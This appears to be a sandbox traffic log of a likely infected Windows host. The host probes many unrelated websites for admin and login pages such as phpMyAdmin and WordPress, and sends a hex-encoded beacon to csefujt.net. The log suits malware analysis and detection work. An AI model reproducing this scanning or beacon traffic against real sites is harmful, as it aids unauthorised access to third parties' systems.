X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_aXUPmxwSErg5m19rL2QPQjF+gbWQghCDztDlHwIQHoRGJkUdRUVmjvMMWbWM351vi6MDobsQ+9dL3n+WJIJ5jw
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
Set-Cookie: country=RO;Path=/;Max-Age=86400;
Set-Cookie: city="";Path=/;Max-Age=86400;
Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
Accept-Ranges: bytes
Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port
456         192.168.2.6  63907        162.241.203.30  80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:07.953428984 CET  170  OUT  GET /admin/ HTTP/1.1
Host: nossoplayer.me
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.069029093 CET  1114  IN  HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:16:08 GMT
Server: Apache
Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html


Session ID | Source IP | Source Port | Destination IP | Destination Port
457 | 192.168.2.6 | 63780 | 103.90.225.70 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:07.983119011 CET | 175 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: ngoalongvn.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.335704088 CET | 1286 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Length: 1245
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
Feb 5, 2024 12:16:08.335721016 CET | 119 | IN |
Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
458 | 192.168.2.6 | 63975 | 192.185.5.23 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:08.021362066 CET | 169 | OUT | GET /admin HTTP/1.1
Host: multiideas.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.190249920 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:16:08 GMT
Server: nginx/1.23.4
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
X-Server-Cache: true
X-Proxy-Cache: MISS
Set-Cookie: PHPSESSID=5f28c8dc47747c998f6ab732b4b15eec; path=/
Transfer-Encoding: chunked
Feb 5, 2024 12:16:08.190306902 CET | 1286 | IN |
Feb 5, 2024 12:16:08.190342903 CET | 1286 | IN |
Feb 5, 2024 12:16:08.190378904 CET | 1286 | IN |
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190414906 CET1286INData Raw: b8 e3 10 80 ad a6 30 86 4f c7 b1 33 f4 26 48 39 f7 c4 fb 79 98 e0 49 f4 a4 32 b1 f4 b6 39 52 d8 86 62 b2 69 10 39 6b 83 b6 b6 0a 9c da 00 2a 2c 15 ec 5a 9b a6 4c a1 26 3e e0 17 7c 55 45 a7 61 1c 6d 17 6c 8d 09 36 1c 0d 1e 4c 82 d4 75 4c 34 82 c1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0O3&H9yI29Rbi9k*,ZL&>|UEaml6LuL4,zKL(pd9f%4q^b1<9uru*c>Dsv&g'|E!UNgeZSy>:q*Alaaa;;h|C.XXF.JWy{
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190449953 CET1286INData Raw: da 2c 51 71 60 18 cd 6e 65 19 43 49 55 96 ce 8a bc 86 3c f4 3a c2 43 da d0 5a 62 7c 23 62 47 c1 e5 64 63 53 51 da da d9 71 1b 27 4e 85 42 4d 1a 7c 59 55 34 41 10 a7 72 8f 93 53 c1 37 cf 4a 36 16 5d b9 53 06 1e 4a 1f a8 20 9d 8d f1 75 2d 0a b2 da
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ,Qq`neCIU<:CZb|#bGdcSQq'NBM|YU4ArS7J6]SJ u-;#m7$;<$OULJ<lgG6CvQ;-I`XKGqMVdR3Ht3nsbX_o=n5/v-krY
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190484047 CET437INData Raw: d0 f2 93 95 db e1 a5 a1 41 f3 65 ce eb 75 2c 8d 0d 3c ab 7a 07 e4 14 d4 8a a0 35 1f c6 d8 66 1e a1 66 4a b4 43 d3 98 21 4b 8b 27 ba 22 9f f9 46 9e 73 aa 9a c6 93 1c 35 a9 55 93 a6 6a 52 95 73 72 95 3a 65 66 33 9d 33 b1 b4 93 a5 05 a6 12 c8 bd 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Aeu,<z5ffJC!K'"Fs5UjRsr:ef33l1QS43coZ}i71i6N&^JEHW:&$M<'F8cE<%T^Zz\uO!j{AK \Mq7wSYx*
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190520048 CET1286INData Raw: 32 30 30 30 0d 0a a7 e2 f2 62 76 b7 18 d6 97 af 2e 66 87 c7 db eb 6d 8f 28 07 aa 5b cd 8b 6e b9 dd e8 65 bf 3d b4 85 3a 76 ed c3 d7 db f7 f3 a2 62 c3 a0 9c 2d 90 cc 6a b5 ec 17 87 c3 bc 60 6c 0a 85 ba 2b eb 64 32 7e e0 72 31 30 e9 04 b5 a0 c2 1a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2000bv.fm([ne=:vb-j`l+d2~r102Pr1rCxKp{sZ0<?CU*:S>N?4eMY:]_pjy?X%/NM204Z
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190555096 CET1286INData Raw: d6 32 eb 7c 82 3b 7d 52 37 bf 66 70 95 8b f9 e6 bc 73 3e 6d 46 2b 12 98 aa ce 1a 68 c9 e7 34 68 67 2d 16 a7 08 79 00 fd 71 6a 67 53 3c 0f 43 8b f3 cd 19 96 3a 29 8d 7c 25 af 67 19 f3 99 6f 90 ff 74 15 e5 c3 3a 8a bd 3b f5 93 1e 67 df 19 31 73 06
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2|;}R7fps>mF+h4hg-yqjgS<C:)|%got:;g1s*Q_&eMyK>]2S|V=S$_I|"G1-6hy4',@U?]5B&%#62NS:+@twkvYiuXI9bX_o=n
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.190591097 CET1286INData Raw: 8c 39 b2 43 dd ac 01 08 f4 1e f3 07 dc 53 87 a3 11 9b e2 a3 4e 11 69 f2 f5 74 65 8c d8 db a6 32 e0 29 a4 e6 a8 d3 09 0a bf 22 1c 46 33 04 47 51 e0 36 53 56 26 e5 10 cb d9 cc 44 76 64 3e f1 cc 33 f8 73 0c 59 8f 3a 62 c0 b9 67 93 ac 78 13 b8 70 c2
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 9CSNite2)"F3GQ6SV&Dvd>3sY:bgxp>M1T212CM!lo,dL9jW9'cItc9 p$-aw36PJR/wc!{fpho!IW*$*zIF2-4v4?EM8
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.292263031 CET1286INData Raw: cc 0e 8f b7 d7 db 1e 51 0e 54 b7 9a 17 dd 72 bb d1 ef fa 6e f9 fd be 50 c7 ae 7d f8 7a fb 7e 5e 54 b0 a5 ad 95 b3 05 b2 59 ae 96 fd e2 70 98 17 8c 4d a1 50 78 65 31 3d 45 25 e7 ce 96 c6 06 14 b9 32 3a ba 38 54 cd 20 67 be 39 9a ba 34 1e 3e 56 92
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: QTrnP}z~^TYpMPxe1=E%2:8T g94>V'O1'_O:y&Etelmin3R9SMnG7c).oIzKMzX)m/;.M]iX}.WuY,Mdj4z6


Session ID | Source IP | Source Port | Destination IP | Destination Port
459 | 192.168.2.6 | 63948 | 54.71.181.160 | 80

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:08.061645031 CET | 182 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: ucivirtual.uci.edu.mx
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.236547947 CET | 1286 | IN | HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/10.0
Date: Mon, 05 Feb 2024 11:15:23 GMT
Content-Length: 1245
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its
Feb 5, 2024 12:16:08.236574888 CET | 97 | IN | Data Ascii: name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
460 | 192.168.2.6 | 63979 | 103.224.182.210 | 80

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:08.069947958 CET | 178 | OUT | GET /admin.php HTTP/1.1
Host: followerstiktok.xyz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.234778881 CET | 346 | IN | HTTP/1.1 302 Found
date: Mon, 05 Feb 2024 11:16:08 GMT
server: Apache
set-cookie: __tad=1707131768.7567410; expires=Thu, 02-Feb-2034 11:16:08 GMT; Max-Age=315360000
location: http://ww16.followerstiktok.xyz/admin.php?sub1=20240205-2216-0830-9373-ed2bb15864e8
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port
461 | 192.168.2.6 | 63968 | 64.190.63.111 | 80

Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:08.103563070 CET | 170 | OUT | GET /PhpMyAdmin/ HTTP/1.1
Host: foros.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.314415932 CET | 88 | IN | HTTP/1.1 439
date: Mon, 05 Feb 2024 11:16:08 GMT
content-length: 0
server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port
462 | 192.168.2.6 | 64197 | 3.161.150.69 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:08.139760017 CET | 181 | OUT | GET /wp-login.php HTTP/1.1
Host: account.booking.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.241449118 CET | 581 | IN | HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:16:08 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://account.booking.com/wp-login.php
X-Cache: Redirect from cloudfront
Via: 1.1 ef4d1d652a04133dcc01bb4f66ae886a.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL59-P5
X-Amz-Cf-Id: 5lmlXqoWE1MOULL11tniUk5blWPxVIjswV1SzBCEksdTH1PH5KB3Ew==
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>
Feb 5, 2024 12:16:10.822598934 CET | 229 | OUT | GET /wp-admin/ HTTP/1.1
Host: account.booking.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Referer: https://account.booking.com/wp-login.php
Feb 5, 2024 12:16:10.925257921 CET | 578 | IN | HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:16:10 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://account.booking.com/wp-admin/
X-Cache: Redirect from cloudfront
Via: 1.1 ef4d1d652a04133dcc01bb4f66ae886a.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL59-P5
X-Amz-Cf-Id: RK1Gqr68aJro8TAlk6ZtFZcSFqMo5ERcTVGlwbOPDDLn-3HJu7G2SQ==
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
463 | 192.168.2.6 | 64029 | 64.190.63.111 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:08.163333893 CET | 165 | OUT | GET /admin/ HTTP/1.1
Host: foros.net
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.372397900 CET | 88 | IN | HTTP/1.1 439
date: Mon, 05 Feb 2024 11:16:08 GMT
content-length: 0
server: NginX


Session ID | Source IP | Source Port | Destination IP | Destination Port
464 | 192.168.2.6 | 64110 | 185.51.191.48 | 80
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:16:08.201529980 CET | 283 | OUT | GET /admin/w/login HTTP/1.1
Host: innovationdevelopment.eu
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; PHPSESSID=81af54a664f4ec74095989818025e221
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.558607101 CET | 1286 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:16:07 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3575<!DOCTYPE html><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/admin.css?v=1707131767" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/_custom_admin.css?v=1707131767" /><link rel="stylesheet" href="//code.jquery.com/ui/1.11.2/them
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558628082 CET1286INData Raw: 65 73 2f 73 6d 6f 6f 74 68 6e 65 73 73 2f 6a 71 75 65 72 79 2d 75 69 2e 63 73 73 22 20 2f 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 63 6f 64 65 2e 6a 71 75 65 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: es/smoothness/jquery-ui.css" /><script type="text/javascript" src="//code.jquery.com/jquery-1.11.1.min.js"></script><script type="text/javascript" src="//code.jquery.com/ui/1.11.2/jquery-ui.min.js"></script><script type="text/javascri
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558691978 CET1286INData Raw: 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6e 69 63 65 73 63 72 6f 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ="text/javascript" src="/js/jquery/jquery.nicescroll.js"></script><link rel="stylesheet" href="/js/jquery/icheck/skins/flat/blue.css"><script type="text/javascript" src="/js/jquery/icheck/icheck.min.js"></script><link rel="stylesheet"
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558711052 CET1286INData Raw: 77 68 69 74 65 3b 7a 2d 69 6e 64 65 78 3a 35 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 09 2e 62 6f 78 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 30 70 78 20 33 70 78 20 23 33 33 33 33 33 33 3b 7a 2d 69 6e 64 65 78 3a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: white;z-index:5;position:relative;}.box{box-shadow:0px 0px 3px #333333;z-index:5;position:relative;}.info{box-shadow:0px 0px 3px #333333;z-index:5;position:relative;}</style>...[if IE]><script src="http://html5shiv.googleco
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558734894 CET1286INData Raw: 0a 09 09 7d 0d 0a 09 7d 29 3b 0d 0a 09 66 75 6e 63 74 69 6f 6e 20 63 6f 70 79 54 78 74 28 65 6c 65 6d 29 20 7b 0d 0a 09 09 76 61 72 20 63 6f 70 79 54 65 78 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: }});function copyTxt(elem) {var copyText = document.getElementById(elem);copyText.select();copyText.setSelectionRange(0, 99999); /*For mobile devices*/document.execCommand("copy");$('<div>Szveg vglapra helyez
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558754921 CET1286INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 22 3e 31 32 3a 31 36 3a 30 37 3c 2f 62 3e 3c 2f 64 69 76 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 09 76 61 72 20 61 64 6d 69 6e 5f 62 61 6e 6e 65 72 5f 74 69 6d 65 5f 69 6e 74 3d 73 65 74 49 6e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: lay:inline-block;">12:16:07</b></div><script>var admin_banner_time_int=setInterval(function(){date=new Date();h=date.getHours(); if(h<10) h="0"+h; m=date.getMinutes(); if(m<10) m="0"+m; s=date.g
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558775902 CET1286INData Raw: 65 5f 66 70 73 22 20 73 74 79 6c 65 3d 22 7a 2d 69 6e 64 65 78 3a 31 30 30 30 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 31 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 62 6c 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e_fps" style="z-index:1000;left:0;top:100px;position:absolute;background-color:black;color:white;"></span></div> <script>(function() {setTimeout(function(){$('#admin_bing_bg_wrapper').fadeIn(1000);},500);setTimeout(fu
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558800936 CET1286INData Raw: 0a 09 09 76 61 72 20 66 70 73 3d 30 2c 20 66 70 73 5f 73 75 6d 3d 30 2c 20 66 70 73 5f 61 6c 6c 3d 30 3b 0d 0a 09 09 76 61 72 20 77 69 6e 64 3d 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2f 31 30 30 3b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: var fps=0, fps_sum=0, fps_all=0;var wind=(Math.random()-Math.random())/100;var mousex, mousey=0;var fpsdown=0;// MaininitHeader();addListeners();function initHeader() {width = $('#admin_bing_bg_wrapper
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558864117 CET1286INData Raw: 75 65 73 74 41 6e 69 6d 46 72 61 6d 65 28 29 7b 0d 0a 09 09 09 69 66 28 21 6c 61 73 74 43 61 6c 6c 65 64 54 69 6d 65 29 20 7b 0d 0a 09 09 09 09 6c 61 73 74 43 61 6c 6c 65 64 54 69 6d 65 20 3d 20 44 61 74 65 2e 6e 6f 77 28 29 3b 0d 0a 09 09 09 09
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: uestAnimFrame(){if(!lastCalledTime) {lastCalledTime = Date.now();fps = 0;return;}delta = (Date.now() - lastCalledTime)/1000;lastCalledTime = Date.now();fps = 1/delta;fps_sum++;fps_all=fps_al
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.558883905 CET1286INData Raw: 0d 0a 09 09 09 09 5f 74 68 69 73 2e 61 6c 70 68 61 20 3d 20 30 3b 0d 0a 09 09 09 09 5f 74 68 69 73 2e 73 63 61 6c 65 20 3d 20 31 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 32 3b 0d 0a 09 09 09 09 5f 74 68 69 73 2e 76 65 6c 6f 63 69 74 79 20 3d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: _this.alpha = 0;_this.scale = 1+Math.random()*2;_this.velocity = Math.random();_this.life = 0;_this.speed = 0.01+Math.random()/100;}this.draw = function() {if(_this.alpha < 0 || _this.life>2 || _
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.567738056 CET1133INData Raw: 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 09 09 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 63 6c 61 73 73 3d 22 6e 69 63 65 63 68 65 63 6b 22 3e 0d 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ss="login"><form action="" method="POST" class="nicecheck"><input type="text" name="uname" placeholder="Username" required /><br><br><input type="password" name="pass" placeholder="Password" required /><br><br><cen


Session ID  Source IP    Source Port  Destination IP  Destination Port
465         192.168.2.6  64125        185.196.8.22    80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:08.207520008 CET  326  OUT
GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:16:08.453330040 CET  220  IN
HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:16:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID  Source IP    Source Port  Destination IP  Destination Port
466         192.168.2.6  64290        64.91.249.20    80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:08.235790014 CET  171  OUT
GET /admin.php HTTP/1.1
Host: chainmine.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.420814991 CET  354  IN
HTTP/1.1 302 Moved Temporarily
Date: Mon, 05 Feb 2024 11:16:08 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Powered-By: PHP/5.4.16
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Location: http://ww7.chainmine.io/admin.php?usid=27&utid=4923817456
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port
467         192.168.2.6  64252        190.202.2.80    80

Timestamp  Bytes transferred  Direction  Data
Feb 5, 2024 12:16:08.244395018 CET  186  OUT
GET /wp-admin/ HTTP/1.1
Host: contribuyente.seniat.gob.ve
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.406167030 CET  499  IN
HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:16:08 GMT
Server: Oracle-Application-Server-10g
Location: http://contribuyente.seniat.gob.ve/index.htm
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
Data Ascii: f8 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>301 Moved Permanently</TITLE></HEAD><BODY><H1>Moved Permanently</H1>The document has moved <A HREF="http://contribuyente.seniat.gob.ve/index.htm">here</A>.<P></BODY></HTML>0
Feb 5, 2024 12:16:08.406413078 CET | 186 | OUT | GET /index.htm HTTP/1.1
Host: contribuyente.seniat.gob.ve
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:08.568466902 CET | 1160 | IN | HTTP/1.1 200 OK
Date: Mon, 05 Feb 2024 11:16:08 GMT
Server: Oracle-Application-Server-10g
Set-Cookie: HttpOnly;Secure
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'self';
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: no-referrer
Clear-Site-Data: cache
X-Frame-Options: DENY, SAMEORIGIN
Feature-Policy: layout-animations 'none'; unoptimized-images 'none'; oversized-images 'none'; sync-script 'none'; sync-xhr 'none'; unsized-media 'none';
X-XSS-Protection: 1; mode=block
Expect-CT: enforce; max-age=43200
Public-Key-Pins: none
Last-Modified: Mon, 15 May 2023 15:21:36 GMT
ETag: "11fc95-2dd-64624e00"
Accept-Ranges: bytes
Content-Length: 733
